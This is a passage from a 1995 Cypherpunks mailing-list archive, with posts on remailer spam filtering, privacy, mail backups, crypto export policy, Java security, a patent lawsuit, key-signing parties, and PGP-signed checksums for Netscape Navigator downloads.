I can't give you any specific pointers, but I advise you to check out 
existing implementations of these and other techniques for information
retrieval before you spend too much time writing new code.

FWIW, I _do_ think that such tactics would be very effective in combatting 
much of the spam served up these days.

> One side effect to the deployment of spam detectors may be that the remailer
> pinging services will need to move to using encrypted packets. 
[...]
> My impression is (speak up if I'm wrong) that requiring encryption for the
> ping packets wouldn't be an enormous burden on the pinging services because
> the new generation of software sends fewer pinging packets such that the
> CPU time required isn't an issue. 

Last time I looked, Raph's software already encrypts ping messages to 
remailers that have PGP keys. I assume you intend to perform the spam check
after removing the optional outer layer of encryption on each incoming
message.

Perhaps the ping messages would survive unscathed if you only applied the
spam scan to messages larger than some minimum size. I haven't seen too many
1 or 2 line spams.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Tue, 10 Oct 95 21:06:32 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <199510110312.AA01324@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text/plain


> > We mustn't forget that, until very recently, strong, widespread
> > privacy has been humanity's "default" condition.
> 
> Not much privacy in village or tribal life.  Even neighborhoods of 
> earlier cities weren't very private.  Neighbors always knew your business.

I now realize that my first response to this point was stupid.  I was
focused exclusively on what one might call "transient" privacy -- the
ability to wander out of general earshot for the occassional private
conversation.  I now see that there is another kind of privacy, which
one might call "steady-state" privacy -- that is, the ability to live
large portions of one's life out of the light of public scrutiny.

In traditional small village or tribal life, transient privacy is
rarely threatened, but steady-state privacy may be nonexistent.  This
is an important point which I didn't get the first time around, and I
apologize for giving it short shrift.

The various GAK strategies, on the other hand, represent a nearly
opposite strategy, preserving (at least in theory) general
steady-state privacy (thereby perhaps satisfying the letter, if not
the spirit, of most human rights law) while making it impossible to
reliably ensure the privacy of any specific thing (Bentham's concealed
random observer model for cost-efficient control of a population).

These two types of privacy, of course, are not truly distinct, but are
ends of a continuous spectrum.  Yet they raise different challenges.
This is all very interesting; it seems to imply the possibility of
some sort of analytic system.

But it's late and I'm not particularly brilliant, so I'll end here.

					---  mkj



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 00:01:37 PDT
To: garnett@wombat.catbelly.com (Santiago de la Paz)
Subject: Re: PC disk wipe softwar
In-Reply-To: <199510110113.TAA08320@wombat.catbelly.com>
Message-ID: <199510110656.XAA28320@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Excuse me? Yes, most systems back up everything. I run an
ISP. We back up -everything- (well not netnews), nightly.

> 
> 
> > Often files retrieved include e-mail thought to have been
> > erased long ago. It survives because the diligent
> > computer system manager makes backup tapes of everything
> > on the system every night, then stores those tapes for
> > years.
> 
> Uh... they back up their *mail* spools?  Yeah, right.
> 
> ~james
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 11 Oct 95 00:04:46 PDT
To: mark@lochard.com.au (Mark)
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510102312.AA37668@junkers.lochard.com.au>
Message-ID: <199510110659.XAA28427@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> IMHO we owe Netscape some counter pr against m$, we've proved our point to
> Netscape and they performed admirally by being open and responsible to the
> net.community. Whilst it didnt seem to dent their share value, they did cop

	<yawn> This is old news. http://www.c2.org/hackmsoft/ has been
around for multiple weeks now.

> some bad press (and some media weenies still think their product is broken)
> because of the groups efforts. What goads me is m$ trying to use this in
> their press dealing and acting like this is entirely different from their
> situation. Seems to me they need it proved to them that because of their
> proprietary attitude they are in a worse position. In short bring them down
> to earth and serve their ego to them on a plate.
> 
> Cheers,
> Mark
> mark@lochard.com.au
> The above opinions are rumoured to be mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santiago de la Paz <garnett@wombat.catbelly.com>
Date: Tue, 10 Oct 95 23:07:06 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
In-Reply-To: <199510110319.AA32344@junkers.lochard.com.au>
Message-ID: <199510110606.AAA08734@wombat.catbelly.com>
MIME-Version: 1.0
Content-Type: text/plain



> People do record their incoming and outgoing email. Smart ones will store it
> offsite (auto farward to their home machine). Others will pgp them online.
> Mostly though the cleartext email files will be happily archived away each
> night to the nice friendly DAT tape down the corridor in the machine room.

I mistakenly interpreted the original posting as "outgoing only."  Incoming
mail must certainly be saved; however, backing up an outgoing mail spool on
a busy machine is senseless.  By "busy", I mean "that machine which serves
as a mail server".

Outboxes change the situation, but they are not universal.  

> Me, I just nuke any sensitive information that may arrive in my work mbox,
> or save/forward it to a safer place. I discourage people from using my work
> address as a regular personal contact point.

This brings up an interesting point, namely: where is your email secure?  If
the FBI or security agency of your choice decides to clamp a legal hold upon
the machines upon which you work, they surely wouldn't be so foolish as to
forget about your home machine over that frame-relay or ppp/slip link.  In
such a situation, telling people to use any mailbox at all is useless unless
they encrypt with a relatively secure encryption package, z.B. pgp.

> Also ensure your admins aren't the nosy types. I started work at one place
> and noticed in the /.sh_history file that the previous admin was regularly
> grepping peoples mail spools for his name. This caused some concern to the
> management when they were informed. Obviously these forays were not part of
> his everyday job and were a personal endeavour.

This is a problem, and almost certainly more of a problem than security
agencies demanding your backup tapes.  There's also no way around it; the
only solution is encryption.

~james




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 10 Oct 95 21:29:16 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape & Fortessa
In-Reply-To: <199510110025.RAA10439@jobe.shell.portal.com>
Message-ID: <199510110427.AAA05498@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510110025.RAA10439@jobe.shell.portal.com>,
hfinney@shell.portal.com (Hal) wrote:

> There seems to be a convergence on this approach to a hardware
> solution.  HP has been pushing for a model in which software with hooks
> for hardware encryption will be allowed to get exported.  Then you can
> plug in whatever level of encryption you are able to have in the
> form of a card token.  Traditionally NSA has opposed export of software
> with hooks but there are some indications that this method could be
> accepted eventually.

Yes, it might, because of the strong support by vendors for voluntary GAK
or no crypto at all. Let me explain. There are a number of indicators that
show that strong crypto is losing in the global marketplace. Example: the
charter of the new IETF Internet Payment Systems working group requires
that the use of crypto be limited. In the discussion about the charter,
the near unanimous consent (with myself as the sole dissenter) was that
crypto may only be used for authentication, not confidentiality.

It is true that the prospect of loosening the rules for crypto
software/hardware implementations is a major motivator in the marketplace.
The whole development of National Semi's iPower PCMCIA card was driven by
a promise made by the NSA of high lot numbers due to (future?) relaxed
export rules. I suppose that trapdoors in hardware are much harder to find
than trapdoors in software.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHtHmCoZzwIn1bdtAQFm6AGAje0x07V6Ak/nnBLIQyAv9XDZToUw0vju
2GmRq/F1eSeiiOGfXwVGP+irPFd1W/tg
=nix8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 11 Oct 95 00:24:59 PDT
To: cypherpunks@toad.com
Subject: Re: Man in the Middle Revisited (but not for the last time)
Message-ID: <aca0be1c14021004e28c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I suspect I'm not the only one getting weary of going around and around on
this issue, so I'll confine my response to just one point:

At 3:37 AM 10/11/95, Bryce wrote:

>> Who any of these entities "really" are is irrelevant to me. (I don't even
>> know if Hal Finney, who I met once a few years ago, is the "real" Hal
>> Finney, nor do I really care.)
>
>
>Well and good, Tim, but you *do* care if the entity calling itself "Hal
>Finney" is being surrounded by the Man in the Channel ("Mitch") and all
>of your communications with that entity are under Mitch's control.  For
>example, you may choose to enter a contract with the entity calling
>itself "Hal Finney", and provide some sort of consulting service to it
>in exchange for 10,000 cyberbucks.  If Mitch is actually in control
>then he could easily steal both the output of your consultation *and*
>Hal's 10,000 cyberbucks and leave the two of you hating each other.

Nope. au contraire, negatory. I *do not* care if the entity calling itself
"Hal Finney" is being surrounded by an MITM. Only "Hal Finney the Key" can
read messages I encrypt to the public key I got from him long ago, so if
the "Hal + MITM" can do so, they are effectively one and the same.

(Not really, in some other senses, but far beyond anything simple crypto
can handle.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Tue, 10 Oct 95 22:35:20 PDT
To: Nahum Goldmann <Nahum.Goldmann@ARRAYdev.com>
Subject: Re: The Ultimate GUK[TM] (Globally Unique Key) Biotech Racket
In-Reply-To: <199510090009.UAA19196@array1.arraydev.com>
Message-ID: <Pine.SUN.3.91.951011013015.29274J-100000@dorsai.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


Bad idea.

What's to stop someone from getting a hair off your hairbrush, or shaking 
hands with you while wearing gloves that can scrape off enough cells from 
you to get your DNA - then they have your private key.

Not cool.  Hell, clipper (barf!) would be safer.

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 10 Oct 95 17:53:10 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510092146.AA28192@alpha>
Message-ID: <Pine.HPP.3.91.951011013937.26964A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally wrote:

> interested in a little e-hanky-panky, I can ask around the sleazier
> corners of the net to see whether Alice is the kiss-and-post type.
> 
> Somebody's going to have to explain to my thick skull how it is that a
> certificate system makes this process any different, fundamentally.

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
*This Key was signed by AidsFree Inc., a THL (Trusted HIV Laboratory)*
 
 The Time-Stamped Public Key of AidsFree Inc. can be found at:
 shttp://health.cdc.gov/hiv/trusted_labs/aidsfree/dec-99/

 Date: 20/12/99
 Aidsfree Inc. certifies that a person (*Alice*) in proven 
 posession of This Key was tested HIV negative at this date.
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santiago de la Paz <garnett@wombat.catbelly.com>
Date: Wed, 11 Oct 95 00:50:12 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe softwar
In-Reply-To: <199510110656.XAA28320@infinity.c2.org>
Message-ID: <199510110750.BAA08909@wombat.catbelly.com>
MIME-Version: 1.0
Content-Type: text/plain



> Excuse me? Yes, most systems back up everything. I run an
> ISP. We back up -everything- (well not netnews), nightly.

Hmm.  Any why *don't* you back up netnews?  For more or less the
same reasons it's not particularly useful to back up outgoing mail
spools; to claim that "most systems do blah blah" is like saying that
"most people like menudo."  I, for one, don't.

"{I/we} run an ISP" is a ubiquitous statement these days;  everybody and his
brother "runs an ISP."  I know a drunken college dropout down the block with
a limping sun 3/50 and two phone lines who prides himself on his ISP.  What is 
not so common is common sense regarding privacy, ie there is not any real 
reason to back up an *outgoing* mail spool unless you want security_agency_of_
your_choice to come and root through your exabyte tapes next week.

Now, as I mentioned in a followup, incoming mail is a different matter.  At
some point it loses its meaning, though: mail is mail, and it's all incoming
somewhere.  The only useful alternative is strong encryption of *all* 
messages, an alternative which solves both the nosy-sysadmin problem as well
as styming the snooping legal beagles.

~james




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 10 Oct 95 22:51:12 PDT
To: perry@piermont.com
Subject: Re: java security concerns
In-Reply-To: <199510101500.LAA02245@jekyll.piermont.com>
Message-ID: <199510110550.BAA02068@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Mike McNally writes:
> >  > I can
> >  > physically remove all the "dangerous" calls from a Postscript
> >  > interpreter and still have it be useful.
> > 
> > I don't see the difference.  An interpreter is an interpreter.
> 
> I suppose most of this is dead obvious to me because I work in
> security every day, but it seems that some otherwise smart people don't
> see the point I'm making, repeatedly.
> 
> As an exercise to the reader compare the following two tasks in
> difficulty.
> 
> 1) Find a bug that lets you execute arbitrary programs unintentionally
>    from a program that contains instances of the 'fork()' system call.
> 
> 2) Find a bug that lets you execute arbitrary programs unintentionally
>    from a  program that contains *no* instances of the 'fork()' system call.

   I agree, however I would point out that not all postscript interpreters
are emasculated (especially those on unix systems like IRIX, they contain
all kinds of calls to fork(), read()/open(), etc). Nothing in the
Java spec tells you that you must call fork() in a Java interpreter
implementation. In fact, Java has nothing to do with the GUI calls, the
network calls, etc. You can support as much or as little system
I/O in a Java implementation as you want. If need be, a Java
implementation could hard code all data needed from a hard disk into 
executable and run entirely in ram, and totally remove all file
system access. (except the implicit one needed to load and run
the executable in the first place) Even Java apps without network
or filesystem capability are useful (as graphic widgets), but I think
atleast the ability to load URLs is a good thing, and can be done
in a reasonable secure manner.

  Atleast from my reading of the Java Language Spec, and Virtual Machine,
there is no requirement that an implementation implement the File I/O
classes. Having a standardized class hierarchy is probably a good idea
though.

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Wed, 11 Oct 95 01:58:40 PDT
To: cypherpunks@toad.com
Subject: PKP Lawsuit progress report
Message-ID: <rschlafly2840858110>
MIME-Version: 1.0
Content-Type: text/plain



I have a lawsuit against Public Key Partners and RSA Data Security.
(Schlafly v. PKP & RSA, Case C-94-20512 SW PVT.)

(1) PKP has been ordered dissolved by an arbiter.  The MIT patent
returns to RSA Data Security, and the Stanford patents go under the
control of Cylink.  I am happy to report that my lawsuit contributed
to this outcome.

(2) I will soon be deposing:

	Whit Diffie
	Ralph Merkle
	Martin Hellman
	Ron Rivest

I will be asking all the obvious questions.  My purpose is to break
their patents.  Does anyone have anything special for me to ask?
If so, please send me your ideas.

(3) There will be a hearing on the patent validity (and a couple of
annoying technical legal issues) at 10:00 am, Dec. 6, 1995, in the
court of Judge Spencer Williams, Federal Bldg, 280 S. First St,
San Jose CA 95113.  The US court clerk is at 408-291-7783.  It is
open to the public.

Roger Schlafly
rschlafly@attmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Tue, 10 Oct 95 23:20:34 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: How to hold a key signing party?
Message-ID: <v01520c00aca10da1b732@[199.227.2.129]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 5:59 PM 10/10/95, you wrote:
>Joe Block writes:
> > What I have in mind is to have everyone who is planning on attending send
> > me their key and its fingerprint....
> >
> > This seems like a lot of work, which I don't mind, but if there is a more
> > efficient method, I'd like to know about it.
>
>Doesn't make any difference to me, you nefarious agent of the Great
>Man In The Middle you.
>
>
>
>[ You got to get up *pretty early in the morning* to put one over on
>*me* like that. ]

Each person at the party would confirm what their key signature was so the
other attendees could check their handout.  They then take the handout that
they have personally checked the key signatures on home with them so that
when they recieve the keys from yours truly they can compare the
fingerprint they get with the fingerprint the owner claimed for the key,
which they checked against the handout when they were at the party, yes?
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMHtiEWGnwFiC3O2NAQFo5ggArfaPrtROH9QmB0luwrliH92fEguQAekd
EsY46cEt1tGP3wXzvbVf6ArzZf/cs60Rsj71ufGVmPytF88VNfo/av0LhCGtNKAh
imTTcWaFvMsSnpEm3qAUAWSJK5WVVlkW7wV0ZEt8YVrX7QZCaXqq2rKzCPwSh3Ga
VToHUDBbRESgEOkS1FxKluZiXa1Ym5P4Nwepno72TXvn/V2flc7iItV0WpLbaL4p
abNwCP/haFViMeg8QbmMXP5+hojFnptK/v7Wc/D7XlRFB6CezAY/duHBwPsNueWI
t4zegApZulk/nJ9da319etZ8OPMWIy0Li7cHlfvwd4/7kbsDmJoLJg==
=1qlc
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 11 Oct 95 02:23:10 PDT
To: cypherpunks@toad.com
Subject: Checksums for current release versions of Netscape Navigator
Message-ID: <199510110921.CAA29846@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

  This file contains checksums for the Netscape Navigator 1.12 and 1.22
distributions and patch files that are available on the Netscape ftp
site under the directory ftp://ftp.netscape.com/netscape/.  This file
has been digitally signed using PGP to assure its authenticity.  The
version of PGP which was used to create the digital signature
on this document was obtained from http://bs.mit.edu:8001/pgp-form.html/.

  This file was signed using my private key.  It can be obtained from
my web page using this URL:

	http://home.netscape.com/people/jsw/my-pgp-key.txt

or by searching for 'jsw@netscape.com' from the PGP key server at mit:

	http://www-swiss.ai.mit.edu/~bal/pks-commands.html#extract

  There are three sets of checksums in this file.  The first set of
checksums uses MD5 to create 128-bit checksums that can not be forged.
The second and third sets of checksums were generated using the two
forms of the unix 'sum' command.  The 'sum' command creates a 16-bit
checksum, which can be used detect accidental corruption during download,
but is too small to protect you from malicious tampering.

  There are two version of the checksums for the unix 'sum' command because
unix vendors follow two different standards.  I have labeled the
checksums with the systems that they are good for.  If you are performing
the checksum operation on a unix system that is not listed, check both
lists and make sure that one matches.

	--Jeff

============================================================

These MD5 checksums were generated with the 'md5sum' program from the PGP2.6.2
distribution, which was obtained from http://bs.mit.edu:8001/pgp-form.html/.

4355327d682ee02b34384cbb30e8042d  ./mac/netscape-1.12.hqx
314326ea7f6e16a7ed51b4ddd32830dc  ./mac/patch_1.1_to_1.12/nscp_1.1_68K_update.hqx
af1e3a626a3ba3e903e9268bdacdd879  ./mac/patch_1.1_to_1.12/nscp_1.1_FAT_update.hqx
dc70e43f7541cdcca334cf81a53fe5ab  ./mac/patch_1.1_to_1.12/nscp_1.1_PPC_update.hqx
44ab217346102d4bd3c8b648ac915eb7  ./unix/netscape-v112-export.alpha-dec-osf2.0.tar.Z
2b359e275d4f18fc532cc33eeda05f06  ./unix/netscape-v112-export.hppa1.1-hp-hpux.tar.Z
5eaba5768b4bc35e869659a720221eec  ./unix/netscape-v112-export.i386-unknown-bsd.tar.Z
0b94e22d6e103dc1425eb5587be5e639  ./unix/netscape-v112-export.i486-unknown-linux.tar.Z
858389abea7cd4aa2211d28e4637cbf8  ./unix/netscape-v112-export.mips-sgi-irix5.2.tar.Z
0a8dedc135abe48405cd663d77a53496  ./unix/netscape-v112-export.rs6000-ibm-aix3.2.tar.Z
40a1c0418d4273b198bf82f4520bc483  ./unix/netscape-v112-export.sparc-sun-solaris2.3.tar.Z
5f0e785bdf1e7e6fadeb79a3cc77daf5  ./unix/netscape-v112-export.sparc-sun-sunos4.1.3_U1.tar.Z
d9e4b2c7d5b18992d900c3299fbbcf33  ./windows/n16e122.exe
fd59a0505d0e29a20703409e47eef9ee  ./windows/n32e122.exe
9cef44bb905ce05af46012482f1b1e28  ./windows/patch122/n16d122p.exe
77e5634c83b79615e8d085c9187721d7  ./windows/patch122/n32d122p.exe

============================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on SGI IRIX and HPUX systems.

33513 2993 ./mac/netscape-1.12.hqx
56041 482 ./mac/patch_1.1_to_1.12/nscp_1.1_68K_update.hqx
36637 859 ./mac/patch_1.1_to_1.12/nscp_1.1_FAT_update.hqx
28284 460 ./mac/patch_1.1_to_1.12/nscp_1.1_PPC_update.hqx
39304 5287 ./unix/netscape-v112-export.alpha-dec-osf2.0.tar.Z
26165 4285 ./unix/netscape-v112-export.hppa1.1-hp-hpux.tar.Z
37396 3262 ./unix/netscape-v112-export.i386-unknown-bsd.tar.Z
26207 3164 ./unix/netscape-v112-export.i486-unknown-linux.tar.Z
39858 2068 ./unix/netscape-v112-export.mips-sgi-irix5.2.tar.Z
6109 2000 ./unix/netscape-v112-export.rs6000-ibm-aix3.2.tar.Z
2249 3420 ./unix/netscape-v112-export.sparc-sun-solaris2.3.tar.Z
62215 7254 ./unix/netscape-v112-export.sparc-sun-sunos4.1.3_U1.tar.Z
18716 3254 ./windows/n16e122.exe
20238 3494 ./windows/n32e122.exe
6931 210 ./windows/patch122/n16d122p.exe
34741 480 ./windows/patch122/n32d122p.exe

============================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on Sun, DEC OSF/1, AIX, BSDI, and
Linux systems.

51500  1497 ./mac/netscape-1.12.hqx
43890   241 ./mac/patch_1.1_to_1.12/nscp_1.1_68K_update.hqx
62256   430 ./mac/patch_1.1_to_1.12/nscp_1.1_FAT_update.hqx
09953   230 ./mac/patch_1.1_to_1.12/nscp_1.1_PPC_update.hqx
32352  2644 ./unix/netscape-v112-export.alpha-dec-osf2.0.tar.Z
03948  2143 ./unix/netscape-v112-export.hppa1.1-hp-hpux.tar.Z
02857  1631 ./unix/netscape-v112-export.i386-unknown-bsd.tar.Z
17319  1582 ./unix/netscape-v112-export.i486-unknown-linux.tar.Z
53470  1034 ./unix/netscape-v112-export.mips-sgi-irix5.2.tar.Z
05441  1000 ./unix/netscape-v112-export.rs6000-ibm-aix3.2.tar.Z
02463  1710 ./unix/netscape-v112-export.sparc-sun-solaris2.3.tar.Z
17806  3627 ./unix/netscape-v112-export.sparc-sun-sunos4.1.3_U1.tar.Z
22208  1627 ./windows/n16e122.exe
04365  1747 ./windows/n32e122.exe
32585   105 ./windows/patch122/n16d122p.exe
37352   240 ./windows/patch122/n32d122p.exe

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHt6O6wWZfp0yzT1AQGrgwP/QF1AY9Wp44OjK0he3E+IRq9VbuxXrn1H
NjNWuSxOLlWrDYiIDu9L+pbCmz2Fu8+3S9c8J4sz80Rzd73kT5xL8dfbQBb7GwqD
Xot99yYrwNaSPRkixHk+n1M4sVHe2UO6u+tZJDYM2PFcy5Ycdw7qQGvEfy1rJTWN
8Y/tYU9eQx4=
=lu96
-----END PGP SIGNATURE-----
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 11 Oct 95 02:23:35 PDT
To: cypherpunks@toad.com
Subject: Checksums for current beta versions of Netscape Navigator
Message-ID: <199510110921.CAA29849@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

  This file contains checksums for the Netscape Navigator 2.0 Beta 1
distribution files that are available on the Netscape ftp
site under the directory ftp://ftp.netscape.com/2.0beta/.  This file
has been digitally signed using PGP to assure its authenticity.  The
version of PGP which was used to create the digital signature
on this document was obtained from http://bs.mit.edu:8001/pgp-form.html/.

  This file was signed using my private key.  It can be obtained from
my web page using this URL:

	http://home.netscape.com/people/jsw/my-pgp-key.txt

or by searching for 'jsw@netscape.com' from the PGP key server at mit:

	http://www-swiss.ai.mit.edu/~bal/pks-commands.html#extract

  There are three sets of checksums in this file.  The first set of
checksums uses MD5 to create 128-bit checksums that can not be forged.
The second and third sets of checksums were generated using the two
forms of the unix 'sum' command.  The 'sum' command creates a 16-bit
checksum, which can be used detect accidental corruption during download,
but is too small to protect you from malicious tampering.

  There are two version of the checksums for the unix 'sum' command because
unix vendors follow two different standards.  I have labeled the
checksums with the systems that they are good for.  If you are performing
the checksum operation on a unix system that is not listed, check both
lists and make sure that one matches.

	--Jeff

============================================================

These MD5 checksums were generated with the 'md5sum' program from the PGP2.6.2
distribution, which was obtained from http://bs.mit.edu:8001/pgp-form.html/.

e4d757027c1178aecc06c145f20ab204  mac/netscape-2.0b1.hqx
5d52a03be4a624290203bc039dd28349  unix/netscape-v20b1-export.alpha-dec-osf2.0.tar.Z
f0f31cddacccbbfcdd8246ced2e7617a  unix/netscape-v20b1-export.hppa1.1-hp-hpux.tar.Z
d1e3aeda9f5f420f60a490f542e79afb  unix/netscape-v20b1-export.i386-unknown-bsd.tar.Z
50b9ebbefd85d6aec7148bc1bbce98ba  unix/netscape-v20b1-export.i486-unknown-linux.tar.Z
0c36e244198f9bff06773bdfee9af0f9  unix/netscape-v20b1J-export.mips-sgi-irix5.2.tar.Z
c96cb263338b41b9ea760b51924ad6ec  unix/netscape-v20b1J-export.sparc-sun-solaris2.3.tar.Z
f07c96bb55082e5f55673db802eef3aa  unix/netscape-v20b1J-export.sparc-sun-solaris2.4.tar.Z
4608ad65f84d9cf348c80c5daaf7d1a3  unix/netscape-v20b1J-export.sparc-sun-sunos4.1.3_U1.tar.Z
2da4eb8323ff129cf45916d79ebf6786  unix/netscape-v20b1N-export.mips-sgi-irix5.2.tar.Z
cb24fe8fdf8cd80fcaf38cb04ba58c09  unix/netscape-v20b1N-export.sparc-sun-solaris2.3.tar.Z
3d774018b74a829eb8e9c0d4b275c70e  unix/netscape-v20b1N-export.sparc-sun-solaris2.4.tar.Z
6855b8b433a6c399fe648980b366ca17  unix/netscape-v20b1N-export.sparc-sun-sunos4.1.3_U1.tar.Z
9eb68bb9a253590db4c2b33ef5622857  windows/n16e20b1.exe
6b2ad80bab5e088c7ca1490180639a54  windows/n32e20b1j.exe
6d28d97b070047952cbef8c41e8f9969  windows/n32e20b1n.exe

============================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on SGI IRIX and HPUX systems.

42079 4073 mac/netscape-2.0b1.hqx
34756 3895 unix/netscape-v20b1-export.alpha-dec-osf2.0.tar.Z
51925 5265 unix/netscape-v20b1-export.hppa1.1-hp-hpux.tar.Z
2999 4176 unix/netscape-v20b1-export.i386-unknown-bsd.tar.Z
27660 4140 unix/netscape-v20b1-export.i486-unknown-linux.tar.Z
31887 4380 unix/netscape-v20b1J-export.mips-sgi-irix5.2.tar.Z
42699 5045 unix/netscape-v20b1J-export.sparc-sun-solaris2.3.tar.Z
13440 3493 unix/netscape-v20b1J-export.sparc-sun-solaris2.4.tar.Z
42771 10436 unix/netscape-v20b1J-export.sparc-sun-sunos4.1.3_U1.tar.Z
65334 3395 unix/netscape-v20b1N-export.mips-sgi-irix5.2.tar.Z
4778 4163 unix/netscape-v20b1N-export.sparc-sun-solaris2.3.tar.Z
19694 2631 unix/netscape-v20b1N-export.sparc-sun-solaris2.4.tar.Z
18032 9123 unix/netscape-v20b1N-export.sparc-sun-sunos4.1.3_U1.tar.Z
43870 3795 windows/n16e20b1.exe
57104 5160 windows/n32e20b1j.exe
15350 4031 windows/n32e20b1n.exe

============================================================

These checksums were generated using the Unix 'sum' command.  These checksums
are for the form of the sum command that is on Sun, DEC OSF/1, AIX, BSDI, and
Linux systems.

55511  2037 mac/netscape-2.0b1.hqx
33305  1948 unix/netscape-v20b1-export.alpha-dec-osf2.0.tar.Z
11463  2633 unix/netscape-v20b1-export.hppa1.1-hp-hpux.tar.Z
20324  2088 unix/netscape-v20b1-export.i386-unknown-bsd.tar.Z
00757  2070 unix/netscape-v20b1-export.i486-unknown-linux.tar.Z
40936  2190 unix/netscape-v20b1J-export.mips-sgi-irix5.2.tar.Z
02777  2523 unix/netscape-v20b1J-export.sparc-sun-solaris2.3.tar.Z
02868  1747 unix/netscape-v20b1J-export.sparc-sun-solaris2.4.tar.Z
20826  5218 unix/netscape-v20b1J-export.sparc-sun-sunos4.1.3_U1.tar.Z
57613  1698 unix/netscape-v20b1N-export.mips-sgi-irix5.2.tar.Z
20105  2082 unix/netscape-v20b1N-export.sparc-sun-solaris2.3.tar.Z
34742  1316 unix/netscape-v20b1N-export.sparc-sun-solaris2.4.tar.Z
49054  4562 unix/netscape-v20b1N-export.sparc-sun-sunos4.1.3_U1.tar.Z
35104  1898 windows/n16e20b1.exe
07688  2580 windows/n32e20b1j.exe
26580  2016 windows/n32e20b1n.exe

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHuLwawWZfp0yzT1AQHBIAQAveA07AVIwD2AbeLiwGhP36MArzbYE91j
A+eB10U5asUND9Y0RlcnP0Mrlwt6as6qUhC0n3OLlUFgXdijyXAUBDmCMA3XUBzg
V0vIkYP5FaJh/AAPj0CMT0NPipMJDdlv679PTIEttx7jW8Wa9ZF8pholmcsE5mFQ
0vNOdeeA/mU=
=OHV8
